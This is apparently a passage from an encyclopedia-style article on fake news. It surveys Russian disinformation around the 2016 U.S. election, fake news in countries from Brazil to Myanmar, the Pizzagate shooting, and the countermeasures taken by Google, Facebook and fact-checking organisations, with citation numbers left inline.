It would have been a reboot of the Active Measures Working Group set up by Reagan Administration. 104 105 The Counter-Disinformation Team was set up under the Bureau of International Information Programs. 104 105 Work began in 2014, with the intention to combat propaganda from Russian sources such as the RT network (formerly known as Russia Today). 104 105 U.S. Intelligence officials explained to former National Security Agency analyst and counterintelligence officer John R. Schindler that the Obama Administration decided to cancel the unit as they were afraid of antagonizing Russia. 104 105 U.S. Undersecretary of State for Public Diplomacy Richard Stengel was point person for the unit before it was canceled. 104 105 Stengel previously wrote about disinformation by RT. 106 107 108 Adrian Chen observed a pattern in December 2015 where pro-Russian accounts became supportive of 2016 U.S. presidential candidate Donald Trump. 3 Andrew Weisburd and Foreign Policy Research Institute fellow and senior fellow at the Center for Cyber and Homeland Security at George Washington University, Clint Watts, 109 wrote for The Daily Beast in August 2016 that Russian propaganda fabricated articles were popularized by social media. 3 Weisburd and Watts documented how disinformation spread from Russia Today and Sputnik News, "the two biggest Russian state-controlled media organizations publishing in English", to pro-Russian accounts on Twitter. 3 Citing research by Chen, Weisburd and Watts compared Russian tactics during the 2016 U.S. election to Soviet Union Cold War strategies. 3 They referenced the 1992 United States Information Agency report to Congress, which warned about Russian propaganda called active measures. 3 They concluded social media made active measures easier. 3 Institute of International Relations Prague senior fellow and scholar on Russian intelligence, Mark Galeotti, agreed the Kremlin operations were a form of active measures. 
22 The most strident Internet promoters of Trump were not U.S. citizens but paid Russian propagandists. The Guardian estimated their number to be in the "low thousands" in November 2016. 110 Weisburd and Watts collaborated with colleague J. M. Berger and published a follow-up to their Daily Beast article in online magazine War on the Rocks, titled: "Trolling for Trump: How Russia is Trying to Destroy Our Democracy". 109 111 112 They researched 7,000 pro-Trump accounts over a 2 1 2 year period. 111 Their research detailed trolling techniques to denigrate critics of Russian activities in Syria, and proliferate lies about Clinton's health. 111 Watts said the propaganda targeted the alt-right, the right wing, and fascist groups. 109 After each presidential debate, thousands of Twitter bots used hashtag Trumpwon to change perceptions. 113 In November 2016 the Foreign Policy Research Institute a stated Russian propaganda exacerbated criticism of Clinton and support for Trump. 17 18 The strategy involved social media, paid Internet trolls, botnets, and websites in order to denigrate Clinton. 17 18 Computer security company FireEye concluded Russia used social media as a weapon to influence the U.S. election. 25 FireEye Chairman David DeWalt said the 2016 operation was a new development in cyberwarfare by Russia. 25 FireEye CEO Kevin Mandia stated Russian cyberwarfare changed after fall 2014, from covert to overt tactics with decreased operational security. 25 Bellingcat analyst Aric Toler explained fact-checking only drew further attention to the fake news problem. 115 U.S. Intelligence agencies debated why Putin chose summer 2016 to escalate active measures. 116 Prior to the election, U.S. national security officials said they were anxious about Russia tampering with U.S. news. 113 Director of National Intelligence James R. Clapper said after the 2011 13 Russian protests, Putin lost self-confidence, and responded with the propaganda operation. 116 Former CIA officer Patrick Skinner said the goal was to spread uncertainty. 115 House Intelligence Committee Ranking Member Adam Schiff commented on Putin's aims, and said U.S. intelligence were concerned with Russian propaganda. 116 Speaking about disinformation that appeared in Hungary, Slovakia, the Czech Republic, and Poland, Schiff said there was an increase of the same behavior in the U.S. 116 U.S. intelligence officials stated in November 2016 they believed Russia engaged in spreading fake news, 22 and the FBI released a statement saying they were investigating. 22 113 Two U.S. intelligence officials each told BuzzFeed News they "believe Russia helped disseminate fake and propagandized news as part of a broader effort to influence and undermine the presidential election". 22 The U.S. intelligence sources stated this involved "dissemination of completely fake news stories". 22 They told BuzzFeed the FBI investigation specifically focused on why "Russia had engaged in spreading false or misleading information". 22 Fake news has influenced political discourse in multiple countries, including Germany, 12 Indonesia, 13 Philippines, 13 Sweden, 14 China, 117 118 Myanmar, 119 16 and the United States. 3 Politicians in Austria dealt with the impact of fake news and its spread on social media after the 2016 presidential campaign in the country. 120 In December 2016, a court in Austria issued an injunction on Facebook Europe, mandating it block negative postings related to Eva Glawischnig-Piesczek, Austrian Green Party Chairwoman. 
120 According to The Washington Post the postings to Facebook about her "appeared to have been spread via a fake profile" and directed derogatory epithets towards the Austrian politician. 120 The derogatory postings were likely created by the identical fake profile that had previously been utilized to attack Alexander van der Bellen, who won the election for President of Austria. 120 Brazil faced increasing influence from fake news after the 2014 re-election of President Dilma Rousseff and Rousseff's subsequent impeachment in August 2016. 121 In the week surrounding one of the impeachment votes, 3 out of the 5 most-shared articles on Facebook in Brazil were fake. 121 In 2015, reporter Tai Nalon resigned from her position at Brazilian newspaper Folha de S.Paulo in order to start the first fact-checking website in Brazil, called Aos Fatos (To The Facts). 121 Nalon told The Guardian there was a great deal of fake news, and hesitated to compare the problem to that experienced in the U.S. 121 Fake news online was brought to the attention of Canadian politicians in November 2016, as they debated helping assist local newspapers. 122 Member of Parliament for Vancouver Centre Hedy Fry specifically discussed fake news as an example of ways in which publishers on the Internet are less accountable than print media. 122 Discussion in parliament contrasted increase of fake news online with downsizing of Canadian newspapers and the impact for democracy in Canada. 122 Representatives from Facebook Canada attended the meeting and told members of Parliament they felt it was their duty to assist individuals gather data online. 122 Fake news during the 2016 U.S. election spread to China. 121 Articles popularized within the United States were translated into Chinese and spread within China. 121 The government of China used the growing problem of fake news as a rationale for increasing Internet censorship in China in November 2016. 123 China then published an editorial in its Communist Party newspaper The Global Times called: "Western Media's Crusade Against Facebook", and criticized "unpredictable" political problems posed by freedoms enjoyed by users of Twitter, Google, and Facebook. 117 China government leaders meeting in Wuzhen at the third World Internet Conference in November 2016 said fake news in the U.S. election justified adding more curbs to free and open use of the Internet. 118 China Deputy Minister Ren Xianliang, official at the Cyberspace Administration of China, said increasing online participation led to "harmful information" and fraud. 124 Kam Chow Wong, a former Hong Kong law enforcement official and criminal justice professor at Xavier University, praised attempts in the U.S. to patrol social media. 125 The Wall Street Journal noted China's themes of Internet censorship became more relevant at the World Internet Conference due to the outgrowth of fake news. 126 Officials from 11 countries held a meeting in Helsinki in November 2016, in order to plan the formation of a center to combat disinformation cyber-warfare including spread of fake news on social media. 127 The center is planned to be located in Helsinki and include efforts from 10 countries with participation from Sweden, Germany, Finland, and the U.S. 127 Prime Minister of Finland Juha Sipil planned to deal with the center in spring 2017 with a motion before the Parliament of Finland. 
127 Jori Arvonen, Deputy Secretary of State for EU Affairs, said cyberwarfare became an increased problem in 2016, and included hybrid cyber-warfare intrusions into Finland from Russia and Islamic State of Iraq and the Levant. 127 Arvonen cited examples including fake news online, disinformation, and the "little green men" of the Russo-Ukrainian War. 127 France saw an uptick in amounts of disinformation and propaganda, primarily in the midst of election cycles. 121 Le Monde fact-checking division "Les d codeurs" was headed by Samuel Laurent, who told The Guardian in December 2016 the upcoming French presidential election campaign in spring 2017 would face problems from fake news. 121 The country faced controversy regarding fake websites providing false information about abortion. 121 The government's lower parliamentary body moved forward with intentions to ban such fake sites. 121 Laurence Rossignol, women's minister for France, informed parliament though the fake sites look neutral, in actuality their intentions were specifically targeted to give women fake information. 121 During the 10 year period preceding 2016, France was witness to an increase in popularity of far-right alternative news sources called the fachosphere ("facho" referring to fascist); known as the extreme right on the Internet fr . 121 According to sociologist Antoine Bevort, citing data from Alexa Internet rankings, the most consulted political websites in France included galit et R conciliation, Fran ois Desouche fr , and Les Moutons Enrag s. 128 129 These sites increased skepticism towards mainstream media from both left and right perspectives. 121 German Chancellor Angela Merkel lamented the problem of fraudulent news reports in a November 2016 speech, days after announcing her campaign for a fourth term as leader of her country. 12 In a speech to the German parliament, Merkel was critical of such fake sites, saying they harmed political discussion. 12 Merkel called attention to the need of government to deal with Internet trolls, bots, and fake news websites. 12 She warned that such fraudulent news websites were a force increasing the power of populist extremism. 12 Merkel called fraudulent news a growing phenomenon that might need to be regulated in the future. 12 Germany's foreign intelligence agency Federal Intelligence Service Chief, Bruno Kahl de , warned of the potential for cyberattacks by Russia in the 2017 German election. 130 He said the cyberattacks would take the form of the intentional spread of disinformation. 130 Kahl said the goal is to increase chaos in political debates. 130 Germany's domestic intelligence agency Federal Office for the Protection of the Constitution Chief, Hans-Georg Maassen, said sabotage by Russian intelligence was a present threat to German information security. 130 Rasmus Kleis Nielsen, director at Reuters Institute for the Study of Journalism, thinks that "the problems of disinformation in a society like India might be more sophisticated and more challenging than they are in the West". 131 The damage caused due to fake news on social media has increased due to the growth of the internet penetration in India, which has risen from 137 million internet users in 2012 to over 600 million in 2019. 132 India is the largest market for WhatsApp, with over 230 million users, and as a result one of the main platforms on which fake news is spread. 133 134 One of the main problems is of receivers believing anything sent to them over social media due to lack of awareness. 
135 Various initiatives and practices have been started and adopted to curb the spread and impact of fake news. 136 Fake news is also spread through Facebook, WhatsApp 137 and Twitter. 138 139 140 According to a report by The Guardian, the Indian media research agency CMS stated that the cause of spread of fake news was that India "lacked (a) media policy for verification". Additionally, law enforcement officers have arrested reporters and journalists for "creating fictitious articles", especially when the articles were controversial. 141 In India, fake news has been spread primarily by the right-wing political outfits. A study published in ThePrint claimed that on Twitter, there were at least 17,000 accounts spreading fake news to favour the BJP, while around 147 accounts were spreading fake news to favour the Indian National Congress. 142 Similarly, the IT Cell of the BJP has been accused of spreading fake news against the party's political opponents, religious minorities, and any campaigns against the party. 143 144 137 The IT Cells of the BJP, Congress and other political parties have been accused of spreading fake news against the party's political opponents and any campaigns against the party. 145 The RSS mouthpiece Organizer has also been accused of misleading reports. 146 147 Prominent fake news-spreading websites and online resources include OpIndia 158 , TFIPost (previously, The Frustrated Indian) and Postcard News. 159 160 Fraudulent news has been particularly problematic in Indonesia and the Philippines, where social media has an outsized political influence. 13 According to media analysts, developing countries with new access to social media and democracy felt the fake news problem to a larger extent. 13 In some developing countries, Facebook gives away smartphone data free of charge for Facebook and media sources, but at the same time does not provide the user with Internet access to fact-checking websites. 13 On 8 October 2020, Bloomberg reported that 92 websites used by Iran to spread misinformation were seized by the United States government. 161 162 Between 1 October and 30 November 2016, ahead of the Italian constitutional referendum, five out of ten referendum-related stories with most social media participation were hoaxes or inaccurate. 164 165 Of the three stories with the most social media attention, two were fake. 165 Prime Minister of Italy Matteo Renzi met with U.S. President Obama and leaders of Europe at a meeting in Berlin, Germany in November 2016, and spoke about the fake news problem. 163 Renzi hosted discussions on Facebook Live in an effort to rebut falsities online. 164 The influence became so heavy that a senior adviser to Renzi began a defamation complaint on an anonymous Twitter user who had used the screenname "Beatrice di Maio". 121 The Five Star Movement (M5S), an Italian political party founded by Beppe Grillo, managed fake news sites amplifying support for Russian news, propaganda, and inflamed conspiracy theories. 163 166 The party's site TzeTze had 1.2 million Facebook fans and shared fake news and pieces supportive of Putin cited to Russia-owned sources including Sputnik News. 166 TzeTze plagiarized the Russian sources, and copied article titles and content from Sputnik. 167 TzeTze, another site critical of Renzi called La Cosa, and a blog by Grillo—were managed by the company Casaleggio Associati which was started by Five Star Movement co-founder Gianroberto Casaleggio. 
166 Casaleggio's son Davide Casaleggio owns and manages TzeTze and La Cosa, and the medical advice website La Fucina, which markets anti-vaccine conspiracy theories and cure-all remedies. 167 Grillo's blog and the Five Star Movement fake sites use the same IP addresses and the same Google Analytics and Google AdSense accounts. 167 Cyber-warfare against Renzi increased, and the Italian newspaper La Stampa brought attention to false stories by Russia Today which wrongly asserted that a pro-Renzi rally in Rome was actually an anti-Renzi rally. 121 In October 2016, the Five Star Movement disseminated a video from Kremlin-aligned Russia Today which falsely claimed to show thousands of individuals protesting the referendum scheduled in Italy for 4 December 2016, when in fact the video, which went on to 1.5 million views, showed supporters of the referendum. 166 167 President of the Italian Chamber of Deputies, Laura Boldrini, stated: "Fake news is a critical issue and we can't ignore it. We have to act now." 163 Boldrini met on 30 November 2016 with Facebook's vice president of public policy in Europe, Richard Allan, to voice concerns about fake news. 163 She said Facebook needed to admit it was a media company. 163 In 2022 the Italian magazine Panorama brought attention to fake news published by the website "Open di Enrico Mentana", which repeatedly reported a number of false stories regarding the Russo-Ukrainian war. 168 These stories were eventually rejected for lack of evidence by Alina Dubovksa, a journalist at the Ukrainian newspaper Public, as unfounded by Catalina Marchant de Abreu, a journalist at France 24, and also by Oleksiy Mykolaiovych Arestovych, an adviser to the Head of the Office of the President of Ukraine Volodymyr Zelenskyy. 168 Elections in Mexico are routinely distorted by misinformation released to the public, regardless of whether the political party involved is democratic or authoritarian. Because false information easily influences voters in Mexico, it can threaten the stability of the country through the actions taken by misinformed citizens. Fake exit polls have circulated within Mexican digital media outlets, which means that citizens do not receive real data on what is happening in their elections. 169 Amid the 2018 local elections in Moldova, a doctored video with mistranslated subtitles purported to show that a pro-Europe party candidate for mayor of Chișinău (pop. 685,900), the capital of Moldova, had proposed to lease the city of Chișinău to the UAE for 50 years. 170 The video was watched more than 300,000 times on Facebook and almost 250,000 times on the Russian social network site OK.ru, which is popular among Moldova's Russian-speaking population. 170 In 2015, fake stories using unrelated photographs and fraudulent captions were shared online in support of the Rohingya. 171 Fake news negatively affected individuals in Myanmar, leading to a rise in violence against Muslims in the country. 119 16 Online participation surged from one percent to 20 percent of Myanmar's total populace from 2014 to 2016. 119 16 Fake stories from Facebook were reprinted in paper periodicals called Facebook and The Internet. 16 False reporting related to practitioners of Islam in the country was directly correlated with increased attacks on people of the religion in Myanmar. 119 16 Fake news falsely stated that believers in Islam acted out in violence at Buddhist locations. 
119 16 BuzzFeed News documented a direct relationship between the fake news and violence against Muslim people. 119 16 It noted that countries that were relatively newer to Internet exposure were more vulnerable to the problems of fake news and fraud. 16 Khawaja Muhammad Asif, the Minister of Defence of Pakistan, threatened on Twitter to nuke Israel after a false story claimed that Avigdor Lieberman, the Israeli Minister of Defense, had said: "If Pakistan send ground troops into Syria on any pretext, we will destroy this country with a nuclear attack." 172 173 In 2016 Polish historian Jerzy Targalski noted that fake news websites had infiltrated Poland through anti-establishment and right-wing focused sources that copied content from Russia Today. 174 Targalski observed that about 20 specific fake news websites in Poland spread Russian disinformation in the form of fake news. 174 One example cited was the false claim that Ukraine had asserted that the Polish city of Przemyśl was occupied by Poland. 174 In 2020, fake news websites related to the COVID-19 pandemic were identified and officially labelled as such by the Polish Ministry of Health. 175 The Swedish Security Service issued a report in 2015 identifying propaganda from Russia infiltrating Sweden with the objective of amplifying pro-Russian views and inflaming societal conflicts. 14 The Swedish Civil Contingencies Agency (MSB), part of the Ministry of Defence of Sweden, identified fake news reports targeting Sweden in 2016 which originated from Russia. 14 Swedish Civil Contingencies Agency official Mikael Tofvesson stated that a pattern emerged in which views critical of Sweden were constantly repeated. 14 The MSB identified Russia Today and Sputnik News as significant fake news purveyors. 14 As a result of growth in this propaganda in Sweden, the MSB planned to hire six additional security officials to fight back against the campaign of fraudulent information. 14 According to a December 2015 report by The China Post, a fake video shared online showed people a light show purportedly staged at the Shihmen Reservoir. 176 The Northern Region Water Resources Office confirmed there was no light show at the reservoir and the event had been fabricated. 176 The fraud led to an increase in tourist visits to the actual attraction. 176 Deutsche Welle interviewed the founder of Stopfake.org in 2014 about the website's efforts to debunk fake news in Ukraine, including media portrayal of the Ukrainian crisis. 177 Co-founder Margot Gontar began the site in March 2014, and it was aided by volunteers. 177 In 2014, Deutsche Welle awarded the fact-checking website the People's Choice Award for Russian at its The BOBs ceremony, recognizing excellence in advocacy on the Internet. 177 Gontar highlighted an example debunked by the website, where a fictitious "Doctor Rozovskii" supposedly told The Guardian that pro-Ukraine individuals refused to allow him to tend to the injured in fighting with Russian supporters in 2014. 177 Stopfake.org exposed the event as fabricated—there was no individual named "Doctor Rozovskii"—and found that the Facebook photo distributed with the story showed a different individual from Russia with a separate identity. 177 Former Ukrainian president Viktor Yanukovych's ouster from power created instability, and in 2015 the Organization for Security and Co-operation in Europe concluded that Russian disinformation campaigns used fake news to disrupt relations between Europe and Ukraine. 
99 Russian-financed news spread disinformation after the conflict in Ukraine motivated the European Union to found the European External Action Service specialist task force to counter the propaganda. 99 Labour MP Michael Dugher was assigned by Deputy Leader of the Labour Party Tom Watson in November 2016 to investigate the impact of fake news spread through social media. 178 Watson said they would work with Twitter and Facebook to root out clear-cut circumstances of "downright lies". 178 Watson wrote an article for The Independent where he suggested methods to respond to fake news, including Internet-based societies which fact-check in a manner modeled after Wikipedia. 179 Minister for Culture, Matthew Hancock, stated the British government would investigate the impact of fake news and its pervasiveness on social media websites. 180 Watson stated he welcomed the investigation into fake news by the government. 180 On 8 December 2016, Chief of the Secret Intelligence Service (MI6) Alex Younger delivered a speech to journalists at the MI6 headquarters where he called fake news and propaganda damaging to democracy. 30 Younger said the mission of MI6 was to combat propaganda and fake news in order to deliver to his government a strategic advantage in the information warfare arena, and assist other nations including European countries. 30 He called such methods of fake news propaganda online as a "fundamental threat to our sovereignty". 30 Younger said all nations that hold democratic values should feel the same worry over fake news. 30 Fraudulent stories during the 2016 U.S. presidential election popularized on Facebook included a viral post that Pope Francis had endorsed Donald Trump, and another that actor Denzel Washington "backs Trump in the most epic way possible". 183 184 Donald Trump's son and campaign surrogate Eric Trump, top national security adviser Michael T. Flynn, and then-campaign managers Kellyanne Conway and Corey Lewandowski shared fake news stories during the campaign. 181 185 186 187 After the 2016 election, Republican politicians and conservative media began to appropriate the term by using it to describe any news they see as hostile to their agenda, according to The New York Times, which cited Breitbart News, Rush Limbaugh and supporters of Donald Trump as dismissing true mainstream news reports, and any news they do not like as "fake news". 188 The Russian state-operated newswire RIA Novosti, known as Sputnik International, reported fake news and fabricated statements by White House Press Secretary Josh Earnest. 189 RIA Novosti falsely reported on 7 December 2016 that Earnest stated sanctions for Russia were on the table related to Syria. 189 RIA Novosti falsely quoted Earnest as saying: "There are a number of things that are to be considered, including some of the financial sanctions that the United States can administer in coordination with our allies. I would definitely not rule that out. 189 However, the word "sanctions" was never used by the Press Secretary. 189 Russia was discussed in eight instances during the press conference, but never about sanctions. 189 The press conference focused solely on Russian air raids in Syria towards rebels fighting President of Syria Bashar al-Assad in Aleppo. 189 Members of the U.S. Senate Intelligence Committee traveled to Ukraine and Poland in March 2016 and heard about Russian operations to influence internal Ukrainian matters. 
190 Senator Angus King recalled they were informed about Russia "planting fake news stories" during elections. 190 On 30 November 2016 seven members of the Senate Intelligence Committee asked President Obama to publicize information on Russia's role in spreading disinformation in the U.S. election. 190 191 192 On 30 November 2016, legislators approved a measure within the National Defense Authorization Act to finance the U.S. State Department to act against foreign propaganda. 193 194 The initiative was developed through a bipartisan bill, the Countering Foreign Propaganda and Disinformation Act, written by U.S. Senators Republican Rob Portman and Democrat Chris Murphy. 193 Republican U.S. Senators stated they planned to hold hearings and investigate Russian influence on the 2016 U.S. elections. 195 By doing so they went against the preference of incoming Republican President-elect Donald Trump, who downplayed any potential Russian meddling in the election. 195 Senate Armed Services Committee Chairman John McCain, Senate Intelligence Committee Chairman Richard Burr, U.S. Senate Foreign Relations Committee Chairman Bob Corker, and Senator Lindsey Graham all planned investigations in the 115th U.S. Congress session. 195 U.S. President Barack Obama commented on fake news online in a speech the day before Election Day in 2016, saying social media spread lies and created a "dust cloud of nonsense". 29 196 Obama commented again on the problem after the election: "if we can't discriminate between serious arguments and propaganda, then we have problems. 181 182 On 9 December 2016, President Obama ordered U.S. Intelligence Community to conduct a complete review of the Russian propaganda operation. 197 In his year-end press conference on 16 December 2016, President Obama criticized a hyper-partisan atmosphere for enabling the proliferation of fake news. 198 In November 2016, fake news sites and Internet forums falsely implicated the restaurant Comet Ping Pong and Democratic Party figures as part of a fictitious child trafficking ring, which was dubbed "Pizzagate". 199 The rumor was widely debunked by sources such as the Metropolitan Police Department of the District of Columbia, fact-checking website Snopes.com, The New York Times, and Fox News. 200 201 202 203 The restaurant's owners were harassed and threatened, and increased their security. 199 204 205 On 4 December 2016, an individual from Salisbury, North Carolina, walked into the restaurant to "self-investigate" this conspiracy theory. He brought a semi-automatic rifle, and fired shots before being arrested; no one was injured. 202 206 The suspect told police that he planned to "self-investigate" the conspiracy theory, 202 and was charged with assault with a dangerous weapon, carrying a pistol without a license, unlawful discharge of a firearm, and carrying a rifle or shotgun outside the home or business. 207 After the incident, future National Security Advisor Michael T. Flynn and his son Michael G. Flynn were criticized by many reporters for spreading the rumors. 208 209 210 Two days after the shooting, Trump fired Michael G. Flynn from his transition team in connection with Flynn's Twitter posting of fake news. 211 212 Days after the attack, Hillary Clinton spoke out on the dangers of fake news in a tribute speech to retiring Senator Harry Reid at the U.S. Capitol, and called the problem an epidemic. 
213 214 To track junk news shared on Facebook during the 2018 midterm elections, the Junk News Aggregator Archived 2021 01 27 at the Wayback Machine was launched by the Computational Propaganda Project of the Oxford Internet Institute, University of Oxford. This Aggregator is a public platform, offering three interactive tools for tracking in near real-time public posts shared on Facebook by junk news sources, showing the content and the user engagement numbers that these posts have received. 215 Fact-checking websites FactCheck.org, PolitiFact.com and Snopes.com authored guides on how to respond to fraudulent news. 4 40 216 FactCheck.org advised readers to check the source, author, date, and headline of publications. 40 They recommended their colleagues Snopes.com, The Washington Post Fact Checker, b and PolitiFact.com. 40 FactCheck.org admonished consumers to be wary of confirmation bias. 40 PolitiFact.com used a "Fake news" tag so readers could view all stories Politifact had debunked. 216 Snopes.com warned readers social media was used as a harmful tool by fraudsters. 4 The Washington Post's "The Fact Checker" manager Glenn Kessler wrote that all fact-checking sites saw increased visitors during the 2016 election cycle. 218 Unique visitors to The Fact Checker increased five-fold from the 2012 election. 218 Will Moy, director of London-based fact-checker Full Fact, said debunking must take place over a sustained period to be effective. 218 Full Fact worked with Google to help automate fact-checking. 219 FactCheck.org former director Brooks Jackson said media companies devoted increased focus to the importance of debunking fraud during the 2016 election. 217 FactCheck.org partnered with CNN's Jake Tapper in 2016 to examine the veracity of candidate statements. 217 Angie Drobnic Holan, editor of PolitiFact.com, cautioned media companies chiefs must be supportive of debunking, as it often provokes hate mail and extreme responses from zealots. 217 In December 2016, PolitiFact announced fake news was its selection for "Lie of the Year". 220 32 PolitiFact explained its choice for the year: "In 2016, the prevalence of political fact abuse promulgated by the words of two polarizing presidential candidates and their passionate supporters gave rise to a spreading of fake news with unprecedented impunity. 32 PolitiFact called fake news a significant symbol of a culture accepting of post-truth politics. 220 In the aftermath of the 2016 U.S. election, Google and Facebook, faced scrutiny regarding the impact of fake news. 221 The top result on Google for election results was to a fake site. 222 "70 News" had fraudulently written an incorrect headline and article that Trump won the popular vote against Clinton. 223 224 221 Google later stated that prominence of the fake site in search results was a mistake. 225 By 14 November, the "70 News" result was the second link shown when searching for results of the election. 221 When asked shortly after the election whether fake news influenced election results, Google CEO Sundar Pichai responded: "Sure" and went on to emphasize the importance of stopping the spread of fraudulent sites. 226 On 14 November 2016, Google responded to the problem of fraudulent sites by banning such companies from profiting on advertising from traffic through its program AdSense. 26 27 221 Google previously had a policy for denying ads for dieting ripoffs and counterfeit merchandise. 
227 Google stated upon the announcement they would work to ban advertisements from sources that lie about their purpose, content, or publisher. 228 229 The ban is not expected to apply to news satire sites like The Onion, although some satirical sites may be inadvertently blocked under the new system. 221 On 25 April 2017, Ben Gomes wrote a blog post announcing changes to the search algorithms that would stop the "spread of blatantly misleading, low quality, offensive or downright false information. 230 On 27 July 2017, the World Socialist Web Site published data that showed a significant drop after the 25 April announcement in Google referrals to left-wing and anti-war websites, including the ACLU, Alternet, and Counterpunch. 231 The World Socialist Web Site insists that the "fake news" charge is a cover to remove anti-establishment websites from public access, and believes the algorithm changes are infringing on the democratic right to free speech. 232 One day after Google took action, Facebook decided to block fake sites from advertising there. 27 221 Facebook said they would ban ads from sites with deceptive content, including fake news, and review publishers for compliance. 228 These steps by both Google and Facebook intended to deny ad revenue to fraudulent news sites; neither company took actions to prevent dissemination of false stories in search engine results pages or web feeds. 26 233 Facebook CEO Mark Zuckerberg called the notion that fraudulent news impacted the 2016 election a "crazy idea" 234 235 and denied that his platform influenced the election. 236 He stated that 99% of Facebook's content was neither fake news nor a hoax. 237 Zuckerberg said that Facebook is not a media company. 238 Zuckerberg advised users to check the fact-checking website Snopes.com whenever they encounter fake news on Facebook. 239 240 Top staff members at Facebook did not feel simply blocking ad revenue from fraudulent sites was a strong enough response, and they made an executive decision and created a secret group to deal with the issue themselves. 234 235 In response to Zuckerberg's first statement that fraudulent news did not impact the 2016 election, the secret Facebook group disputed this notion, saying fake news was rampant on their website during the election cycle. 234 235 The secret task force included dozens of Facebook employees. 234 235 Facebook faced criticism after its decision to revoke advertising revenues from fraudulent news providers, and not take further action. 241 242 After negative media coverage including assertions that fraudulent news gave the 2016 U.S. presidential election to Trump, Zuckerberg posted a second time about it on 18 November 2016. 241 242 The post was a reversal of his earlier comments on the matter where he had discounted the impact of fraudulent news. 242 Zuckerberg said there it was difficult to filter out fraudulent news because he desired open communication. 241 Measures considered and not implemented by Facebook included adding an ability for users to tag questionable material, automated checking tools, and third-party confirmation. 241 The 18 November post did not announce any concrete actions the company would definitively take, or when such measures would be put into usage. 241 242 National Public Radio observed the changes being considered by Facebook to identify fraud constituted progress for the company into a new media entity. 243 On 19 November 2016, BuzzFeed advised Facebook users they could report posts from fraudulent sites. 
244 Users could choose the report option: "I think it shouldn't be on Facebook", followed by: "It's a false news story. 244 In November 2016, Facebook began assessing use of warning labels on fake news. 245 The rollout was at first only available to a few users in a testing phase. 245 A sample warning read: "This website is not a reliable news source. Reason: Classification Pending". 245 TechCrunch analyzed the new feature during the testing phase and surmised it may have a tendency towards false positives. 245 Fake news proliferation on Facebook had a negative financial impact for the company. Brian Wieser of Pivotal Research predicted that revenues could decrease by two percentage points due to the concern over fake news and loss of advertising dollars. 246 Shortly after Mark Zuckerberg's second statement on fake news proliferation on his website, Facebook decided to engage in assisting the government of China with a version of its software in the country to allow increased censorship by the government. 247 Barron's contributor William Pesek was highly critical of this move, writing by porting its fake news conundrum to China, Facebook would become a tool in that Communist Party's General Secretary Xi Jinping's efforts to increase censorship. 247 Media scholar Dr. Nolan Higdon argues that relying on tech-companies to solve the issues with false information will exacerbate the problems associated with fake news. 248 Higdon contends that tech-companies lack an incentive for solving the problem because they benefit from the proliferation of fake news. Higdon cites tech-companies utilization of data collection as one of the strongest forces empowering fake news producers. Rather than government regulation or industry censorship, Higdon argues for the introduction of critical news literacy education to American education. 248 Society of Professional Journalists president Lynn Walsh said in November 2016 that they would reach out to Facebook to assist weeding out fake news. 249 Walsh said Facebook should evolve and admit it functioned as a media company. 249 On 17 November 2016, the Poynter International Fact-Checking Network (IFCN) c published an open letter on the Poynter Institute website to Mark Zuckerberg, imploring him to utilize fact-checkers to identify fraud on Facebook. 252 253 Signatories to the 2016 letter to Zuckerberg featured a global representation of fact-checking groups, including: Africa Check, FactCheck.org, PolitiFact.com, and The Washington Post Fact Checker. 252 253 In his second post on the matter on 18 November 2016, Zuckerberg responded to the fraudulent news problem by suggesting usage of fact-checkers. 239 240 He specifically identified fact-checking website Snopes.com, and pointed out that Facebook monitors links to such debunkers in reply comments to determine which original posts were fraudulent. 239 240 On 15 December 2016, Facebook announced more specifics in its efforts to combat fake news and hoaxes on its site. 254 28 255 The company said it would form a partnership with fact-checking groups that had joined the Poynter International Fact-Checking Network fact-checkers' code of principles, to help debunk fraud on the site. 28 254 It was the first instance Facebook had ever given third-party entities highlighted featuring in its News Feed, a significant motivator of web traffic online. 28 The fact-checking organizations partnered with Facebook in order to confirm whether or not links posted from one individual to another on the site were factual or fraudulent. 
28 Facebook did not finance the fact-checkers, and acknowledged they could see increased traffic to their sites from the partnership. 28 Fact-checking organizations that joined Facebook's initiative included: ABC News, The Washington Post, Snopes.com, FactCheck.org, PolitiFact, and the Associated Press. 28 Fraudulent articles will receive a warning tag: "disputed by third party fact-checkers". 254 The company planned to start with obvious cases of hoaxes shared specifically for fraudulent purposes to gain money for the purveyor of fake news. 28 Users may still share such tagged articles, and they will show up farther down in the news feed with an accompanying warning. 254 Facebook will employ staff researchers to determine whether website spoofing has occurred, for example "washingtonpost.co" instead of the real washingtonpost.com. 255 In a post on 15 December, Mark Zuckerberg acknowledged the changing nature of Facebook: "I think of Facebook as a technology company, but I recognize we have a greater responsibility than just building technology that information flows through. While we don't write the news stories you read and share, we also recognize we're more than just a distributor of news. We're a new kind of platform for public discourse and that means we have a new kind of responsibility to enable people to have the most meaningful conversations, and to build a space where people can be informed. 255 New York magazine contributor Brian Feldman created a Google Chrome extension that would warn users about fraudulent news sites. 256 He invited others to use his code and improve upon it. 256 Upworthy co-founder and The Filter Bubble author Eli Pariser launched an open-source model initiative on 17 November 2016 to address false news. 257 258 Pariser began a Google Document to collaborate with others online on how to lessen the phenomenon of fraudulent news. 257 258 Pariser called his initiative: "Design Solutions for Fake News". 257 Pariser's document included recommendations for a ratings organization analogous to the Better Business Bureau, and a database on media producers in a format like Wikipedia. 257 258 Writing for Fortune, Matthew Ingram agreed with the idea that Wikipedia could serve as a helpful model to improve Facebook's analysis of potentially fake news. 259 Ingram concluded Facebook could benefit from a social network form of fact-checking similar to Wikipedia's methods while incorporating debunking websites such as PolitiFact.com. 259 Pope Francis, the leader of the Roman Catholic Church, spoke out against fake news in an interview with the Belgian Catholic weekly Tertio (magazine) nl on 7 December 2016. 260 The Pope had prior experience being the subject of a fake news website fiction—during the 2016 U.S. election cycle, he was falsely said to support Donald Trump for president. 260 183 184 Pope Francis said the singular worst thing the news media could do was spreading disinformation and that amplifying fake news instead of educating society was a sin. He compared salacious reporting of scandals, whether true or not, to coprophilia and the consumption of it to coprophagy. 261 262 263 264 The Pope said that he did not intend to offend with his strong words, but emphasized that "a lot of damage can be done" when the truth is disregarded and slander is spread. 262 264 Jamie Condliffe wrote that banning ad revenue from fraudulent sites was not aggressive enough action by Facebook to deal with the problem, and did not prevent fake news from appearing in Facebook news feeds. 
